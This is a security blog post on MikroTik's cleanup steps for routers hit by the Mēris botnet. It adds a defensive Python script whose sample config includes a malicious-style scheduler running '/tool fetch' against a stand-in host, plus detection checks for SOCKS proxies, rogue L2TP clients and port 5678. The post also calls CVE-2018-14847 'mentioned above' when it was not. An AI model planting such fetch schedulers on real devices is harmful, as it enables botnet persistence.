Heimdal Security Blog

Mēris Botnet Mitigation Measures Shared by MikroTik

MikroTik, the Latvia-based manufacturer of network equipment, shared mitigation measures against the Mēris botnet in a blog post published yesterday. Customers can use these measures to secure their compromised routers.

Mēris Botnet: a Little Background

As my colleague Dora wrote on the 10th of September, Mēris is a DDoS botnet that has been impacting the Russian company Yandex for a while, with the attack peaking at 21.8 million requests per second, an all-time high for cyberattacks related to the Russian Internet.

DDoS stands for Distributed Denial-of-Service, a topic covered by my colleague Elena in a well-documented article. Simply put, in this kind of attack, the hacker sends a large number of requests to a web resource, for example a company’s website, with the intention of exceeding that resource's capacity to handle requests, as every website has a limited capacity in this sense. This eventually leads to improper website functionality.

Before this attack targeted Yandex, Cloudflare stopped another one in August that reached no less than 17.2 million requests per second (RPS).

Mēris Botnet Mitigation Measures

In a blog post released yesterday, MikroTik shared some Mēris botnet mitigation measures intended to remove this botnet from compromised gateways.

Since the malware tries to reconfigure MikroTik devices, the company also recommended the plan below:

Configuration to look out for and remove:

System -> Scheduler rules that execute a Fetch script. Remove these.

IP -> Socks proxy. If you don’t use this feature or don’t know what it does, it must be disabled.

L2TP client named “lvpn” or any L2TP client that you don’t recognize.

Input firewall rule that allows access for port 5678.

Source
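The checklist above can also be run offline against a saved configuration export. The following Python script is an added example, not code from MikroTik or from the original post: it scans RouterOS `/export` text for the four items. The sample export is constructed, and the function names and the `known_l2tp` allowlist are assumptions.

```python
import re, shlex

# Constructed sample of RouterOS `/export` text (not from a real device).
SAMPLE_EXPORT = r'''
/interface l2tp-client
add connect-to=vpn.example.invalid name=lvpn user=user1
add connect-to=192.0.2.10 name=office-vpn user=branch
/ip firewall filter
add action=accept chain=input dst-port=5678 \
    protocol=tcp
add action=accept chain=input dst-port=8291 protocol=tcp
add action=drop chain=input in-interface=ether1
/ip socks
set enabled=yes port=5678
/system scheduler
add interval=3m name=sched1 on-event="/tool fetch url=http://example.invalid/x"
add interval=1d name=backup on-event="/system backup save name=daily"
'''

def parse_export(text):
    """Yield (menu, command, params) per export line; wrapped lines are joined."""
    menu = ""
    for line in re.sub(r"\\\r?\n\s*", "", text).splitlines():
        line = line.strip()
        if line.startswith("/"):
            menu = line                      # e.g. "/ip socks"
        elif line and not line.startswith("#"):
            words = shlex.split(line)        # keeps quoted on-event values whole
            yield menu, words[0], dict(w.split("=", 1) for w in words[1:] if "=" in w)

def port_matches(spec, port):
    """True if a dst-port value such as '80,5000-6000' covers `port`."""
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        if lo.isdigit() and (hi or lo).isdigit() and int(lo) <= port <= int(hi or lo):
            return True
    return False

def audit(text, known_l2tp=()):
    """Return one finding per checklist item present in the export."""
    out = []
    for menu, cmd, p in parse_export(text):
        if menu == "/system scheduler" and "fetch" in p.get("on-event", ""):
            out.append(f"scheduler '{p.get('name')}' runs fetch")
        elif menu == "/ip socks" and p.get("enabled") == "yes":
            out.append("SOCKS proxy is enabled")
        elif menu == "/interface l2tp-client" and cmd == "add" and p.get("name") not in known_l2tp:
            out.append(f"unrecognized L2TP client '{p.get('name')}'")
        elif (menu == "/ip firewall filter" and p.get("disabled") != "yes" and p.get("chain") == "input"
              and p.get("action") == "accept" and port_matches(p.get("dst-port", ""), 5678)):
            out.append("input rule accepts port 5678")
    return out
```

Calling `audit(SAMPLE_EXPORT, known_l2tp={"office-vpn"})` returns four findings. A scheduler entry that calls a named script instead of an inline fetch is not caught by this check, so `/system script` entries still need a manual review.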

In 2018, MikroTik RouterOS was impacted by a vulnerability I mentioned above, CVE-2018-14847. The team of experts said in their blog post that the new wave of 2021 DDoS attacks involving the Mēris botnet made use of the same routers that were impacted in 2018. The issue is that if hackers obtained the password in 2018, a mere upgrade is not enough, even though CVE-2018-14847 has long been patched.

Unfortunately, closing the vulnerability does not immediately protect these routers. If somebody got your password in 2018, just an upgrade will not help. You must also change the password, re-check your firewall if it does not allow remote access to unknown parties, and look for scripts that you did not create.

Source